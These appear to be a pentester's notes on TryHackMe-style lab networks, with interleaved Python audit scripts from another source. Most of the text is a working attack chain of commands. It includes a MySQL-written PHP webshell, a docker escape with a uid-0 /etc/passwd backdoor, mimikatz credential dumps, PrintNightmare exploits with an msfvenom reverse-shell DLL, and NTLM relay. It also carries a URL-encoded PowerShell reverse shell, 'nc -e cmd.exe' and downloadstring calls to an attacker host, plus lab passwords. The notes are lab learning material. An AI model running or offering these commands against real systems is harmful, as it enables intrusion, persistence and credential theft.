`route` `arp -a` show gateway found subnet then container upload nmap.sh run `./nmap -sn -n 192.168.100.0/24`
kali set listener and container `nc kali_ip port` and kali received, means container can reach outside
kali `./chisel server -p 12000 --reverse` container `./chisel client 10.50.70.97:12000 R:socks &`
container `./nmap -p- 192.168.100.1 --min-rate 1000`
kali `proxychains -q nmap -sT -Pn -p 22,80,3306,8080,33060 -sC -sV -T5 192.168.100.1`
kali `proxychains -q mysql -h 192.168.100.1 -u admin -p` `select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php';`
kali `proxychains -q curl http://192.168.100.1:8080/revshell.php\?cmd\="whoami"`
now we have 10.200.69.33 www-data
linpeas found SUID -rwsr-xr-x 1 root root 85029736 Oct 14 2020 /usr/bin/docker
`docker image ls` found 'ubuntu 18.04' then `/usr/bin/docker run -v /:/mnt --rm -it ubuntu:18.04 chroot /mnt bash`
read host files; cracked one hash from /etc/shadow: linux-admin:linuxrulez
add a uid=0 user to /etc/passwd and ssh in as that user; we get root on the host machine
I mostly use: `echo 'username:$1$username$MkaiE3rS.z62Rvejgmc.Z/:0:0:/root/root:/bin/bash' >> /etc/passwd`
note: `openssl passwd -1 -salt username password` produces the salted hash part
now we have 10.200.69.33 root
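Added example (not from these notes): a defender-side audit of /etc/passwd that flags the tampering pattern just described, an extra uid-0 account with its hash written straight into passwd, including the 6-field form the one-liner above produces. The file content is constructed.

```python
"""Audit /etc/passwd for the tampering pattern described above: an extra
uid-0 account whose hash is written directly into passwd rather than shadow.
Added example, not from the original notes; SAMPLE_PASSWD is constructed."""
from __future__ import annotations

# Values the passwd password field legitimately holds on a shadowed system.
SHADOW_MARKERS = {"x", "*", "!", "!!"}

# Constructed sample: root, normal accounts, a 7-field backdoor entry and a
# 6-field backdoor entry like the echo one-liner above (gecos field missing).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
linux-admin:x:1000:1000:Linux Admin:/home/linux-admin:/bin/bash
bd00r:$1$bd00r$CONSTRUCTEDHASHxxxxxxxxxxxx:0:0:backdoor:/root:/bin/bash
sixf:$1$sixf$CONSTRUCTEDHASHyyyyyyyyyyyyy:0:0:/root/root:/bin/bash
"""


def audit_passwd(text: str) -> list[tuple[str, str]]:
    """Return (account, reason) pairs a defender should review."""
    findings: list[tuple[str, str]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        name = fields[0]
        if len(fields) != 7:
            # Hand-appended entries are often malformed; still parse what is there.
            findings.append((name, f"line {lineno} has {len(fields)} fields instead of 7"))
        if len(fields) < 3:
            continue
        passwd, uid = fields[1], fields[2]
        if passwd == "":
            findings.append((name, "empty password field: login without a password"))
        elif passwd not in SHADOW_MARKERS:
            findings.append((name, "password hash stored directly in /etc/passwd"))
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((name, "uid 0 account that is not root"))
    return findings


def uid0_accounts(text: str) -> list[str]:
    """Convenience view: every account name with uid 0, root included."""
    return [
        line.split(":")[0]
        for line in text.splitlines()
        if len(line.split(":")) >= 3 and line.split(":")[2] == "0"
    ]


if __name__ == "__main__":
    for account, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{account:12s} {reason}")
```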
besides the uploaded nmap binary, we can use bash and nc
ping sweep on target
`for i in {1..255}; do (ping -c 1 192.168.100.$i | grep "bytes from" &);done`
`for i in {1..255}; do (ping -c 1 10.200.69.$i | grep "bytes from" &);done`
TTL 128 is Windows, so .30, .31 and .35 are Windows machines.
TTL 64 is any type of Unix or Android, so .33 and .250 are Unix.
TTL 255 or above is usually Cisco. So .1 is probably the Cisco router.
So .250 and .1 are out of our range because .1 is the router and .250 is the VPN Server.
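Added example (not from these notes): turning the ping-sweep output into a host inventory with the TTL heuristic above, generalized to allow for the TTL decrement each router hop adds. The ping output is constructed.

```python
"""Turn ping-sweep output into a host inventory using the TTL heuristic
above (64 Unix, 128 Windows, 255 network gear), tolerating the TTL
decrement added by each router hop. Added example, not from the notes;
SAMPLE_PING is constructed."""
from __future__ import annotations

import re

PING_LINE = re.compile(
    r"bytes from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}).*?\bttl=(?P<ttl>\d+)", re.IGNORECASE
)

# Common initial TTLs; a reply's TTL is the initial value minus hops traversed.
INITIAL_TTLS = {64: "Unix-like", 128: "Windows", 255: "Cisco/network device"}

SAMPLE_PING = """\
64 bytes from 10.200.69.1: icmp_seq=1 ttl=255 time=0.15 ms
64 bytes from 10.200.69.30: icmp_seq=1 ttl=128 time=1.01 ms
64 bytes from 10.200.69.31: icmp_seq=1 ttl=128 time=0.93 ms
64 bytes from 10.200.69.33: icmp_seq=1 ttl=64 time=0.40 ms
64 bytes from 10.200.69.35: icmp_seq=1 ttl=126 time=2.10 ms
64 bytes from 10.200.69.250: icmp_seq=1 ttl=64 time=0.20 ms
Request timeout for icmp_seq 1
"""


def guess_os(ttl: int) -> tuple[str, int]:
    """Map an observed TTL to (os family, estimated hops) by picking the
    smallest common initial TTL that is >= the observed value."""
    for initial in sorted(INITIAL_TTLS):
        if ttl <= initial:
            return INITIAL_TTLS[initial], initial - ttl
    return "unknown", 0


def classify_ping_output(text: str) -> dict[str, tuple[str, int]]:
    """ip -> (os family, hops) for every reply line; timeouts are ignored."""
    hosts: dict[str, tuple[str, int]] = {}
    for line in text.splitlines():
        m = PING_LINE.search(line)
        if m:
            hosts[m.group("ip")] = guess_os(int(m.group("ttl")))
    return hosts


if __name__ == "__main__":
    for ip, (family, hops) in sorted(classify_ping_output(SAMPLE_PING).items()):
        print(f"{ip:15s} {family:22s} ~{hops} hop(s)")
```

The heuristic is only that: a tuned initial TTL or a middlebox rewriting TTLs breaks it, so treat the result as a hint to confirm with nmap.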
port scan on target
`target=10.200.69.30; for port in {1..10000}; do (echo >/dev/tcp/$target/$port) &>/dev/null && (echo "Port $port is open:"; nc -w 1 -v $target $port </dev/null | grep -i 'banner\|title\|name\|version') & done | grep succeeded`
but nmap is always more accurate: upload the nmap binary and run `nmap 10.200.69.30,31,35 -Pn -n -T5`
pivot: switch from chisel (doesn't need ssh access) to sshuttle (doesn't need `proxychains` in front of every command)
`sshuttle -r username@10.200.69.33 10.200.69.0/24 192.168.100.0/24`
on the .31 web page, clicking 'Forgot Password?' lets us use the user_token hidden in the cookie to reset gurag's password
after login, home.php is a simple image upload page; uploading shell.php succeeds
gobuster dir found /images; http://10.200.95.31/images/shell.php?cmd=whoami runs as SYSTEM
now we have 10.200.69.31 system
upload mimikatz and dump creds
`c:\windows\temp\mimikatzmine.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" "lsadump::lsa /patch" exit`
got cred watamet:Nothingtoworry!
`crackmapexec smb 10.200.95.30 10.200.95.35 -u users.txt -H hashes.txt`
got cred watamet:d8d41e6cf762a8c77776a1843d4141c9
`xfreerdp /u:watamet /p:Nothingtoworry! +clipboard /dynamic-resolution /cert:ignore /v:10.200.95.35 /drive:share,/opt/`
now we have 10.200.69.35 watamet
`bloodhound-python -c ALL --dns-tcp -u 'watamet@holo.live' -p 'Nothingtoworry!' --zip -ns 10.200.95.30 -d holo.live`
PS C:\Windows\System32\spool\drivers\color> iex(new-object net.webclient).downloadstring('http://10.50.74.163/PowerUp.ps1')
PS C:\Windows\System32\spool\drivers\color> Invoke-AllChecks
bloodhound and powerup both found nothing interesting
kali `impacket-rpcdump @10.200.95.35 | egrep 'MS-RPRN|MS-PAR'`
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
So the target is vulnerable
CVE-2021-1675 - PrintNightmare LPE (PowerShell)
method_1 RCE
`msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.50.74.163 LPORT=9002 -f dll -o innocent.dll`
`rlwrap nc -lnvp 9002` `impacket-smbserver share -smb2support .`
https://github.com/cube0x0/CVE-2021-1675
`python3 CVE-2021-34527.py -d holo.live holo.live/watamet:Nothingtoworry!@10.200.69.35 --remote-dll '\\\\10.50.74.163\\share\\innocent.dll'`
method_1 Local Priv Esc
https://github.com/calebstewart/CVE-2021-1675
PS C:\Users\watamet> iex(new-object net.webclient).downloadstring('http://10.50.74.163/CVE-2021-1675.ps1')
PS C:\Users\watamet> Invoke-Nightmare
# if successful, we have an administrator account admin:P@ssw0rd
now we have 10.200.69.35 administrator
NTLM Relay Attack Requirements:
1. A fully compromised machine in the AD
2. victim machine has SMB signing disabled (if it's enabled, the NTLM challenge is flagged as malicious, because it is not from/signed by kali but from/signed by .35 and kali only forwards it)
3. because kali is not in the target network, we need to set up remote port forwarding
To confirm [SMB signing disabled]
method_1 `crackmapexec smb 10.200.95.30 10.200.95.32`
method_2 `nmap 10.200.95.30 -p 445 -sC -sV -sT -Pn`
method_3 `responder-RunFinger -f ips.txt`
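Added example (not from these notes): an audit that reads the nmap and crackmapexec output from the methods above and lists the hosts that do not require SMB signing, i.e. the ones where enforcing signing is the fix. The scan output is constructed in the tools' real formats.

```python
"""Audit which hosts do not require SMB signing (and so would accept relayed
NTLM authentication) from nmap smb2-security-mode / smb-security-mode output
and crackmapexec banner lines. Added example, not from the notes; the sample
output below is constructed in the tools' real formats."""
from __future__ import annotations

import re

NMAP_HOST = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?")
NMAP_SIGNING = re.compile(r"message[ _]signing:?\s*(.+)$", re.IGNORECASE)
CME_LINE = re.compile(r"^SMB\s+(\d{1,3}(?:\.\d{1,3}){3})\s+445\b.*\(signing:(True|False)\)")

SAMPLE_NMAP = """\
Nmap scan report for 10.200.95.30
Host is up (0.020s latency).
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.200.95.32
Host is up (0.021s latency).
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   message_signing: disabled (dangerous, but default)
"""

SAMPLE_CME = """\
SMB         10.200.95.30    445    THMDC    [*] Windows Server 2019 (name:THMDC) (domain:holo.live) (signing:True) (SMBv1:False)
SMB         10.200.95.32    445    THMSRV   [*] Windows Server 2019 (name:THMSRV) (domain:holo.live) (signing:False) (SMBv1:False)
"""


def signing_required(description: str) -> bool:
    """True only when the tool reports signing as required, not merely enabled."""
    d = description.lower()
    return "required" in d and "not required" not in d


def parse_nmap(text: str) -> dict[str, bool]:
    """ip -> signing required, from nmap normal output."""
    result: dict[str, bool] = {}
    current = None
    for line in text.splitlines():
        m = NMAP_HOST.match(line)
        if m:
            current = m.group(1)
            continue
        m = NMAP_SIGNING.search(line)
        if m and current:
            # SMB2 and SMB1 scripts may both report; signing must be required by all.
            result[current] = result.get(current, True) and signing_required(m.group(1))
    return result


def parse_cme(text: str) -> dict[str, bool]:
    """ip -> signing required, from crackmapexec smb banner lines."""
    return {m.group(1): m.group(2) == "True"
            for m in map(CME_LINE.match, text.splitlines()) if m}


def unsigned_smb_hosts(*scans: dict[str, bool]) -> list[str]:
    """Hosts reported by any scan as not requiring signing; these need
    'Microsoft network server: Digitally sign communications (always)' enabled."""
    merged: dict[str, bool] = {}
    for scan in scans:
        for ip, required in scan.items():
            merged[ip] = merged.get(ip, True) and required
    return sorted(ip for ip, required in merged.items() if not required)


if __name__ == "__main__":
    print(unsigned_smb_hosts(parse_nmap(SAMPLE_NMAP), parse_cme(SAMPLE_CME)))
```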
To shut down the SMB services on 10.200.69.35
`sc stop netlogon`
`sc stop lanmanserver`
`sc config lanmanserver start= disabled`
`sc stop lanmanworkstation`
`sc config lanmanworkstation start= disabled`
`shutdown -r`
To setup remote port forwarding on 10.200.69.35
method_1 meterpreter> portfwd add -R -L 0.0.0.0 -l 445 -p 445
method_2 kali# `./chisel server -p 12000 --reverse` 10.200.69.35> `./chisel client 10.50.70.97:12000 R:socks`
To setup relay on kali
`ntlmrelayx.py -t smb://10.200.111.30 -smb2support -socks` OR `impacket-ntlmrelayx`
To trigger relay
`proxychains impacket-smbexec -no-pass HOLOLIVE/SRV-ADMIN@10.200.95.30` OR `smbexec.py`
Sequence: [proxychains smbexec -no-pass] triggers [.35 connect request to .30] [.30 sends challenge to .35] [.35 port-forwards the challenge to kali] [kali ntlmrelayx.py --target .30] [.30 does not have SMB signing enabled, so it accepts the relayed challenge response]
So... To my understanding, the .30(DC) is responding to its own NTLM challenge
now we have 10.200.69.30 system
`net user username password123! /add && net localgroup Administrators username /add`
`secretsdump.py holo.live/username@10.200.95.30`
nmap scan shows MiniServ 1.890 (Webmin), which is vulnerable to CVE-2019-15107
`git clone https://github.com/MuirlandOracle/CVE-2019-15107`
`cd CVE-2019-15107 ; pip3 install -r requirements.txt`
`./CVE-2019-15107.py 10.200.93.200`
now we have 10.200.67.200 root
save root ssh private key
To setup proxy:
`sshuttle --dns -r root@10.200.93.200 --ssh-cmd "ssh -i id_rsa" 10.200.93.0/24 -x 10.200.93.200`
To do ping sweep in target network:
`for i in {1..255}; do (ping -c 1 10.200.93.${i} | grep "bytes from" &); done` OR upload nmap binary `./nmap-pencer -sn 10.200.93.1-255`
we found .100 has no open ports and .150 has 80,135,139,445,3389,5985
the http default page has a GitStack hint; searchsploit found 'GitStack 2.3.10 - Remote Code Execution' https://www.exploit-db.com/exploits/43777
edit the ip in 43777.py and run `python2 43777.py`; we get code execution as SYSTEM
now we have 10.200.93.150 system
`curl -X POST http://10.200.93.150/web/exploit-pencer.php -d "a=systeminfo"` windows server 2019 x64
.200 `firewall-cmd --list-all` only '10000/tcp' is open
.200 `firewall-cmd --zone=public --add-port 15999/tcp`
`wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat`
.200 `./socat tcp-l:15999 tcp:10.50.94.52:1337`
`nc -nlvp 1337` `curl -X POST http://10.200.93.150/web/exploit-pencer.php -d "a=powershell.exe%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.93.200%27%2C15999%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22"`
the payload targets .200:15999, and socat forwards the shell back to our kali
Persistence:
.150 `net user pencer Password123 /add & net localgroup Administrators pencer /add & net localgroup "Remote Management Users" pencer /add`
`xfreerdp /v:10.200.93.150 /u:pencer /p:'Password123' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share`
.150 `c:\windows\temp\mimikatzmine.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "lsadump::lsa /patch" exit`
`evil-winrm -u administrator -H hash -i 10.200.93.150` OR `evil-winrm -u pencer -p Password123 -i 10.200.93.150`
I don't use msfconsole and empire unless I have to, so I'll skip the empire part.
I like to upload a windows nmap.exe to .150 and install it to scan the last machine 10.200.93.100
To setup portforward:
.150 `./chisel.exe server -p 15997 --socks5`
kali `./chisel_1.7.6_linux_amd64 client 10.200.93.150:15997 9090:socks`
we found the .100 web server looks like a dev version of the one on .150
.150 evil-winrm `download C:\Gitstack\repositories\website.git`
`git clone https://github.com/internetwache/GitTools && GitTools/Extractor/extractor.sh . website`
GitTools outputs 3 folders/commits; `find . -name "*.php"` found an upload function in resources/index.php
test_payload: `exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-test.jpeg.php`
log in to .100/resources and upload test-test.jpeg.php; trigger it at .100/resources/uploads/test-test.jpeg.php
cmd_payload: <?php $cmd = $_GET["pencer"]; if(isset($cmd)){ echo "<pre>" . shell_exec($cmd) . "</pre>"; } die(); ?>
`exiftool test-test.jpeg.php` to check the spelling of the comment section
use https://www.gaijin.at/en/tools/php-obfuscator to obfuscate the payload and add it to the file's comment
now we have 10.200.93.100 thomas
'SeImpersonatePrivilege Enabled' means we could use juicy-potato, SweetPotato or PrintSpoofer, but the room directs us to 'unquoted service path'
.100 `wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """`
output: 'System Explorer Service SystemExplorerHelpService C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe Auto'
.100 `sc qc SystemExplorerHelpService`
output: 'SERVICE_START_NAME : LocalSystem' which means it runs as SYSTEM
.100 `powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"`
output: 'BUILTIN\Users Allow FullControl' which means we can write to the folder
!!!Thanks to Tib3rius course!!!, I know that we need to check whether thomas can restart the service, a step which the room lacks.
upload accesschk.exe to .100 and `accesschk.exe -accepteula -cv thomas SystemExplorerHelpService`
I assume output has 'SERVICE_START' and 'SERVICE_STOP'
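Added example (not from these notes): an audit that reproduces the wmic/sc/get-acl reasoning above for a list of service records, flagging auto-start services with an unquoted path containing spaces and listing the paths Windows would try first, which are the directories whose ACLs need checking. The service records are constructed; the first mirrors the SystemExplorerHelpService output shown above.

```python
"""Audit Windows services for the unquoted-service-path weakness described
above: an auto-start service whose ImagePath is unquoted and contains spaces,
so CreateProcess may try a shorter path first. Added example, not from the
notes; the service records are constructed (the first mirrors the page's
wmic/sc output)."""
from __future__ import annotations

from dataclasses import dataclass


@dataclass
class Service:
    name: str
    pathname: str    # as shown by wmic / sc qc BINARY_PATH_NAME
    startmode: str   # Auto, Manual, Disabled
    start_name: str  # SERVICE_START_NAME, e.g. LocalSystem


SERVICES = [
    Service("SystemExplorerHelpService",
            r"C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe",
            "Auto", "LocalSystem"),
    Service("QuotedSvc", r'"C:\Program Files\Vendor App\svc.exe" -k start', "Auto", "LocalSystem"),
    Service("NoSpaceSvc", r"C:\Vendor\svc.exe", "Auto", "LocalSystem"),
    Service("ManualSvc", r"C:\Program Files\Other Tool\tool.exe", "Manual", r"NT AUTHORITY\LocalService"),
    Service("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto", "LocalSystem"),
]


def executable_part(pathname: str) -> str:
    """Strip arguments: everything up to and including the first '.exe'."""
    idx = pathname.lower().find(".exe")
    return pathname[: idx + 4] if idx != -1 else pathname.split(" ", 1)[0]


def search_order(pathname: str) -> list[str]:
    """Paths CreateProcess tries, in order, for an unquoted path with spaces;
    empty when the path is quoted or contains no spaces."""
    if pathname.lstrip().startswith('"'):
        return []
    exe = executable_part(pathname)
    tokens = exe.split(" ")
    if len(tokens) == 1:
        return []
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))] + [exe]


def audit_services(services: list[Service]) -> list[tuple[str, list[str]]]:
    """(service, search order) for auto-start services outside C:\\Windows whose
    path is unquoted with spaces. Fix: quote the ImagePath; until then, verify
    with accesschk/icacls that no low-privileged user can write to those directories."""
    findings = []
    for svc in services:
        if svc.startmode.lower() != "auto":
            continue
        if svc.pathname.lower().lstrip('"').startswith("c:\\windows\\"):
            continue
        order = search_order(svc.pathname)
        if order:
            findings.append((svc.name, order))
    return findings


if __name__ == "__main__":
    for name, order in audit_services(SERVICES):
        print(name)
        for candidate in order:
            print("   ", candidate)
```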
As for payload, normally I'd go with msfvenom, but the room shows something new to me.
`apt install mono-devel`, edit Wrapper.cs, `mcs Wrapper.cs`, upload Wrapper.exe to the target
remember to test the payload before placing the binary
.100 `copy %temp%\wrapper-pencer.exe "C:\Program Files (x86)\System Explorer\System.exe"`
now we have 10.200.93.100 system
Intro
config DNS `systemd-resolve --interface breachad --set-dns 10.200.24.101 --set-domain za.tryhackme.com`
OR edit /etc/resolv.conf: put 'search za.tryhackme.com' and 'nameserver 10.200.54.101' above any other nameserver
`systemctl restart networking.service`
test DNS `ping za.tryhackme.com` `nslookup thmdc.za.tryhackme.com`
OSINT & Phishing
download and unzip the usernames the room provided
`hydra -I -V -L ./usernames.txt -p 'Changeme123' ntlmauth.za.tryhackme.com http-get '/:A=NTLM:F=401'` which found 4 creds
LDAP Bind Credentials
Follow the room instructions on setting up a rogue LDAP server and conduct 'LDAP pass-back attacks'
find the password tryhackmeldappass1@ by filtering the network traffic in wireshark
`sudo responder -I tun0` capture NetNTLM hash, crack with john got password: tryhackmeldappass1@
Authentication Relays
NBT-NS and LLMNR are ways to resolve hostnames to IP addresses on the LAN. WPAD is a way for Windows hosts to auto-discover web proxies.
Since these are layer 2 protocols, any time we use Responder to capture and poison requests, we must be on the same LAN as the target.
`sudo responder -I tun0` capture NetNTLM hash, crack with john got password: FPassword1!
Microsoft Deployment Toolkit
`ssh thm@THMJMP1.za.tryhackme.com` `powershell -ep bypass`
simulate a PXE client sending a DHCP request and receiving a list of BCD files for configuration.
navigate to http://pxeboot.za.tryhackme.com/ and just pretend you're a DHCP client that's received a list of files.
`tftp -i (Resolve-DnsName thmmdt.za.tryhackme.com).IPAddress GET "\Tmp\x64{BFA810B9-DF7D-401C-B5B6-2F4D37258344}.bcd" conf.bcd`
Analyze the Boot Image
`Import-Module .\powerpxe\PowerPXE.ps1`
`$bcdfile = "conf.bcd"`
`Get-WimFile -bcdFile $bcdfile`
>>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
`$wimfile = '\Boot\x64\Images\LiteTouchPE_x64.wim'`
`$mdtserver = (Resolve-DnsName thmmdt.za.tryhackme.com).IPAddress`
`tftp -i $mdtserver GET "$wimfile" pxeboot.wim`
`Get-FindCredentials -WimFile .\pxeboot.wim` found svcMDT:PXEBootSecure1@
Configuration Files
`scp thm@THMJMP1.za.tryhackme.com:C:/ProgramData/McAfee/Agent/DB/ma.db ma.db`
`sqlite3 ./ma.db` OR `sqlitebrowser ./ma.db &`
sqlite> .tables
sqlite> .schema AGENT_REPOSITORIES
sqlite> SELECT DOMAIN, AUTH_USER, AUTH_PASSWD FROM AGENT_REPOSITORIES;
output: za.tryhackme.com|svcAV|jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
sqlite> .quit
`encrypted_pw='jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q=='`
`python2 ./mcafee-sitelist-pwd-decryption-master/mcafee_sitelist_pwd_decrypt.py $encrypted_pw`
Decrypted password : MyStrongPassword!
`openvpn --config ./adenumeration.ovpn --daemon`
edit /etc/resolv.conf: put 'search za.tryhackme.com' and 'nameserver 10.200.54.101' above any other nameserver
`systemctl restart networking.service`
test DNS `ping za.tryhackme.com` `nslookup thmdc.za.tryhackme.com`
`ssh user.name@za.tryhackme.com@thmjmp1.za.tryhackme.com`
`xfreerdp /d:za.tryhackme.com /u:'user.name' /p:'password' /v:thmjmp1.za.tryhackme.com /drive:.,kali-share +clipboard`
Credential Injection
`runas.exe /netonly /user:domain.tld\username cmd.exe`
`runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe kali-vpn-ip kali-tcp-port"`
/netonly - use the credentials for network sessions only, all other commands run in the current user session on the local host
An attacker could then use the network session to enumerate SYSVOL on the domain controller, since even low level users can read it
SYSVOL: a network folder on a domain controller which is accessible by any authenticated AD account and stores GPO information
FQDN: It represents a specific and complete address, such as host.example.com.
Subdomain: It's a prefix added to the main domain, creating variations like subdomain.example.com.
Enumerating through Command Prompt
`net user /domain` Run on a domain-joined host to enumerate domain users
`net user user.name /domain` Run on a domain-joined host to get information about a specific domain user
`net group /domain` Run on a domain-joined host to enumerate domain groups
`net group groupName /domain` Run on a domain-joined host to get the members of a domain group
`net accounts /domain` Run on a domain-joined host to show the domain password and account lockout policy
!!! net does not show nested groups
!!! net only shows up to 10 groups even if a user is in more
Enumeration through PowerShell
`Get-ADUser -Filter *` return all domain users
`Get-ADUser -Filter 'Name -like "*stevens"'` find any user where name ends in ...stevens
`Get-ADUser -Identity john.doe -Properties *` find the user john.doe and return all properties
`Get-ADGroup -Filter *` return all domain groups
`Get-ADGroup -Identity Administrators | Get-ADGroupMember` pipe the Administrators group object to Get-ADGroupMember to retrieve members of the group
Get any domain objects that we modified on or after a specific date and time
`$modifiedDate = Get-Date '2022/02/28'` `Get-ADObject -Filter "whenChanged -ge $modifiedDate" -IncludeDeletedObjects`
Change a User Password
`$oldPass = Read-Host -AsSecureString -Prompt 'Enter the old password'`
`$newPass = Read-Host -AsSecureString -Prompt 'Enter the new password'`
`Set-ADAccountPassword -Identity user.name -OldPassword $oldPass -NewPassword $newPass`
0xBEN: PowerShell AD Module on Any Domain Host as Any User
https://notes.benheater.com/books/active-directory/page/powershell-ad-module-on-any-domain-host-as-any-user?ref=benheater.com
Normally, one must install RSAT (Remote Server Administration Tools) on a host to make remote calls to Active Directory from a client computer.
And, one must normally be an administrative user to import the PowerShell Active Directory module.
The trick here is borrowing the Microsoft.ActiveDirectory.Management.dll from a domain-joined host with RSAT installed.
Getting the DLL
`Get-WindowsCapability -Name RSAT*ActiveDirectory* -Online | Add-WindowsCapability -Online`
Finding the DLL
`gci -Path 'C:\Windows' -Recurse -Filter 'Microsoft.ActiveDirectory.Management.dll' -EA SilentlyContinue | ? {$_.FullName -like '*GAC_64*' -or $_.FullName -like '*amd64*'} | select -Expand FullName`
Import to PowerShell
Import-Module 'C:\Path\to\file.dll'
Using the Module
Get-Command -Module Microsoft.ActiveDirectory.Management
Bloodhound
https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.0/SharpHound-v1.1.0.zip
`Invoke-WebRequest http://kali-vpn-ip/SharpHound-v1.1.0.zip -OutFile SharpHound-v1.1.0.zip`
`Expand-Archive SharpHound-v1.1.0.zip ; cd SharpHound-v1.1.0`
`.\SharpHound.exe --CollectionMethods All --Domain za.tryhackme.com --ExcludeDCs`
`scp username@za.tryhackme.com@thmjmp1.za.tryhackme.com:C:/Users/username/Documents/SharpHound-v1.1.0/20220805005305_BloodHound.zip .`
`neo4j console & bloodhound &` import the zip and start analyzing
Additional Enumeration Techniques
=====LdapDomainDump https://notes.benheater.com/books/active-directory/page/ldapdomaindump
nmap found: '389/tcp ldap' '636/tcp ldapssl' '3268/tcp globalcatLDAP' '3269/tcp globalcatLDAPssl'
`ldapdomaindump -u domain.tld\username -p password -o /tmp/ldap_stuff dc-ip-address`
`proxychains -q ldapdomaindump -u domain.tld\username -p password -o /tmp/ldap_stuff dc-ip-address`
=====PowerView.ps1 https://powersploit.readthedocs.io/en/latest/Recon/ https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview
=====WMI https://0xinfection.github.io/posts/wmi-ad-enum/
WMI stands for Windows Management Instrumentation, and it's a powerful framework within the Windows operating system that provides access to a vast range of system information, settings, and management functionalities.
list out the available classes
`Get-WmiObject -Namespace root\directory\ldap -Class ds_* -List`
Finding the domain name
`Get-WmiObject -Namespace root\directory\ldap -Class ds_domain | select ds_dc, ds_distinguishedname, pscomputername`
Getting the domain policy
`Get-WmiObject -Namespace root\directory\ldap -Class ds_domain | select ds_lockoutduration, ds_lockoutobservationwindow, ds_lockoutthreshold, ds_maxpwdage, ds_minpwdage, ds_minpwdlength, ds_pwdhistorylength, ds_pwdproperties`
Finding the domain controller
`Get-WmiObject -Namespace root\directory\ldap -Class ds_computer | where { $_.ds_useraccountcontrol -match 532480 } | select ds_cn, ds_dnshostname, ds_operatingsystem, ds_lastlogon, ds_pwdlastset`
Searching user accounts
`Get-WmiObject -Class win32_useraccount | select name, domain, accounttype`
Filter out just the user accounts for a single domain
`Get-WmiObject -Class win32_useraccount -Filter 'domain="infected"' | select caption`
Enumerating currently logged-on users
`Get-WmiObject -Class win32_loggedonuser | where { $_ -match 'infected' } | foreach {[wmi]$_.antecedent}`
Fetching groups
`Get-WmiObject -Class win32_groupindomain | foreach {[wmi]$_.partcomponent}`
Figuring out group memberships
`Get-WmiObject -Class win32_groupuser | where { $_.groupcomponent -match 'domain admins' } | foreach {[wmi]$_.partcomponent}`
`Get-WmiObject -Class win32_groupuser | where { $_.groupcomponent -match 'Administrator' } | foreach {[wmi]$_.partcomponent}`
Finding machines in the domain
`Get-WmiObject -Namespace root\directory\ldap -Class ds_computer | select ds_cn`
Enumerating admin privileges across AD
`$pcs = Get-WmiObject -Namespace root\directory\ldap -Class ds_computer | select -ExpandProperty ds_cn
foreach ($pc in $pcs) { (Get-WmiObject -Class win32_computersystem -ComputerName $pc -ErrorAction silentlycontinue).name }`
edit /etc/resolv.conf 'search za.tryhackme.com' 'nameserver 10.200.54.101' on up of another nameserver
`systemctl restart networking.service`
test DNS `ping za.tryhackme.com` `nslookup thmdc.za.tryhackme.com`
`ssh user.name@za.tryhackme.com@thmjmp1.za.tryhackme.com`
`xfreerdp /d:za.tryhackme.com /u:'user.name' /p:'password' /v:thmjmp1.za.tryhackme.com /drive:.,kali-share +clipboard`
Credential Injection
`runas.exe /netonly /user:domain.tld\username cmd.exe`
